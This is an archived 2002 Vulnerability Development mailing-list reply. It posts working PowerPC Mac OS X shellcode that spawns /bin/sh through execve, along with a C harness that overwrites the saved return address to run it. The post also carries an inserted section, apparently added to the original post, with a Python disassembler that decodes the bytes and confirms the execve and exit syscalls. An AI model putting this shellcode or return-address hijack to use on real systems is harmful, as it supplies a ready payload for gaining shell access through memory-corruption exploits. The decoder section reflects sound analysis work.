Vulnerability Development mailing list archives
Re: OS X Shell Code
From: fintler <fintler () msec net>
Date: Thu, 10 Jan 2002 16:38:54 -0500
Here's a sample of ppc shellcode (should work fine on mac os x). On ppc you have to worry about the link register having the return address, along with the copy on the stack, so it's not like you can just overwrite it like in x86. Makes it harder to overflow those off by ones I guess... this was written by someone named "Chris Shepard" I think:

#include <stdio.h>

char shellcode[] =
    "\x7c\x08\x02\xa6" /* mflr r0              000 */
    "\x7c\x01\x03\x78" /* mr r1,r0             004 */
    "\x39\x20\x44\x01" /* li r9,17409          008 */
    "\x31\x29\xff\xff" /* addic r9,r9,-1       016 */
    "\x39\x40\x01\x04" /* li r10,260           020 */
    "\x31\x4a\xfe\xfe" /* addic r10,r10,-258   024 */
    "\x30\x41\x01\x74" /* addic r2,r1,372      028 */
    "\xb1\x22\xfe\xfc" /* sth r9,-260(r2)      032 */
    "\xb1\x42\xfe\xfe" /* sth r10,-258(r2)     036 */
    "\x30\x41\x01\x88" /* addic r2,r1,392      040 */
    "\xb1\x22\xfe\xfc" /* sth r9,-260(r2)      044 */
    "\xb1\x42\xfe\xfe" /* sth r10,-258(r2)     048 */
    "\x30\x21\x01\x89" /* addic r1,r1,393      052 */
    "\x30\x21\xfe\xff" /* addic r1,r1,-257     056 */
    "\x7c\x20\x0b\x78" /* mr r0,r1             060 */
    "\x31\x01\x01\x01" /* addic r8,r1,257      064 */
    "\x90\x08\xff\x07" /* stw r0,-249(r8)      068 */
    "\x7c\x03\x03\x78" /* mr r3,r0             072 */
    "\x30\x81\x01\x09" /* addic r4,r1,265      076 */
    "\x30\x84\xfe\xff" /* addic r4,r4,-257     080 */
    "\x7c\xa5\x2a\x78" /* xor r5,r5,r5         084 */
    "\x7c\xc6\x32\x78" /* xor r6,r6,r6         088 */
    "\x31\x01\x01\x01" /* addic r8,r1,257      092 */
    "\x90\xa8\xff\x0b" /* stw r5,-245(r8)      096 */
    "\x7c\xe7\x3a\x78" /* xor r7,r7,r7         100 */
    "\x30\xe7\x01\x3c" /* addic r7,r7,316      104 */
    "\x30\xe7\xfe\xff" /* addic r7,r7,-257     108 */
    "\x7c\xe0\x3b\x78" /* mr r0,r7             112 */
    "\x44\xff\xff\xff" /* sc                   116 */
    "\x7c\xe7\x3a\x78" /* xor r7,r7,r7         120 */
    "\x30\xe7\x01\x02" /* addic r7,r7,258      124 */
    "\x30\xe7\xfe\xff" /* addic r7,r7,-257     128 */
    "\x7c\xe0\x3b\x78" /* mr r0,r7             132 */
    "\x44\xff\xff\xff" /* sc                   136 */
    "\x2f\x62\x69\x6e\x2f\x73\x68\x00"; /* /bin/sh \x00 144 */

int main(void)
{
    int *ret;

    /* point the saved return address slot at the shellcode */
    ret = (int *)&ret + 8;
    (*ret) = (int)shellcode;
    printf("Hi there.\n");
    return 0;
}
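As an added analysis aid (my own code, not from the post or from Chris Shepard), here is a small Python decoder for the handful of PowerPC instruction forms this sample uses. It lets you check the hand-written annotations against the actual encoding, and it follows the li/addic/xor/mr arithmetic to recover the syscall number left in r0 before each sc, which is how the 257/258 and -257 pairs build small numbers without NUL bytes. The only assumption is that the bytes are exactly as they appear in the post.

```python
import struct
# Shellcode words copied from the post above (big-endian hex); the last two words are "/bin/sh\0".
SHELLCODE = bytes.fromhex(
    "7c0802a6 7c010378 39204401 3129ffff 39400104 314afefe 30410174 b122fefc b142fefe"
    " 30410188 b122fefc b142fefe 30210189 3021feff 7c200b78 31010101 9008ff07 7c030378"
    " 30810109 3084feff 7ca52a78 7cc63278 31010101 90a8ff0b 7ce73a78 30e7013c 30e7feff"
    " 7ce03b78 44ffffff 7ce73a78 30e70102 30e7feff 7ce03b78 44ffffff 2f62696e 2f736800")
DFORM = {12: "addic", 14: "addi", 36: "stw", 44: "sth"}   # D-form primary opcodes
XFORM = {316: "xor", 444: "or"}                            # X-form extended opcodes under primary 31

def fields(w):  # primary opcode, RT/RS, RA, RB, 10-bit extended opcode, signed 16-bit immediate
    imm = w & 0xffff
    return (w >> 26, (w >> 21) & 0x1f, (w >> 16) & 0x1f, (w >> 11) & 0x1f,
            (w >> 1) & 0x3ff, imm - 0x10000 if imm & 0x8000 else imm)

def decode(w):  # assembler-style text for the instruction forms this sample uses
    op, rt, ra, rb, xo, imm = fields(w)
    if op == 17:
        return "sc"
    if op in DFORM:
        if op == 14 and ra == 0:
            return f"li r{rt},{imm}"                         # addi with RA=0 is spelled li
        if op in (36, 44):
            return f"{DFORM[op]} r{rt},{imm}(r{ra})"         # stores: RS, displacement(RA)
        return f"{DFORM[op]} r{rt},r{ra},{imm}"
    if op == 31 and xo == 339 and (rb << 5 | ra) == 8:       # mfspr; the SPR field is split and swapped
        return f"mflr r{rt}"
    if op == 31 and xo in XFORM:
        if xo == 444 and rt == rb:
            return f"mr r{ra},r{rt}"                         # or RA,RS,RS is spelled mr
        return f"{XFORM[xo]} r{ra},r{rt},r{rb}"
    return f".long 0x{w:08x}"                                # anything not modelled (e.g. the string)

def disassemble(blob):
    return [decode(w) for (w,) in struct.iter_unpack(">I", blob)]

def syscall_numbers(blob):  # value of r0 at each sc, following the register arithmetic (None if unknown)
    regs, seen = {i: None for i in range(32)}, []
    for (w,) in struct.iter_unpack(">I", blob):
        op, rt, ra, rb, xo, imm = fields(w)
        if op == 14 and ra == 0:
            regs[rt] = imm
        elif op == 12:
            regs[rt] = None if regs[ra] is None else regs[ra] + imm
        elif op == 31 and xo in (316, 444) and rt == rb:
            regs[ra] = 0 if xo == 316 else regs[rt]          # xor rX,rX,rX zeroes; or rA,rS,rS copies
        elif op == 17:
            seen.append(regs[0])
    return seen
```

On this sample `syscall_numbers` yields 59 and then 1, the Darwin numbers for execve and exit, which is a quick way to confirm what a blob of this shape does before running anything.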
Current thread:
- OS X Shell Code Josha Bronson (Jan 10)
- Re: OS X Shell Code ghandi (Jan 10)
- <Possible follow-ups>
- Re: OS X Shell Code fintler (Jan 10)
- Re: OS X Shell Code Josha Bronson (Jan 10)
- Re[2]: OS X Shell Code Meder Kydyraliev (Jan 10)
- Re: OS X Shell Code qobaiashi (Jan 11)
- Re: OS X Shell Code Josha Bronson (Jan 10)
- RE: OS X Shell Code Andersen, Thomas Bjoern (Jan 11)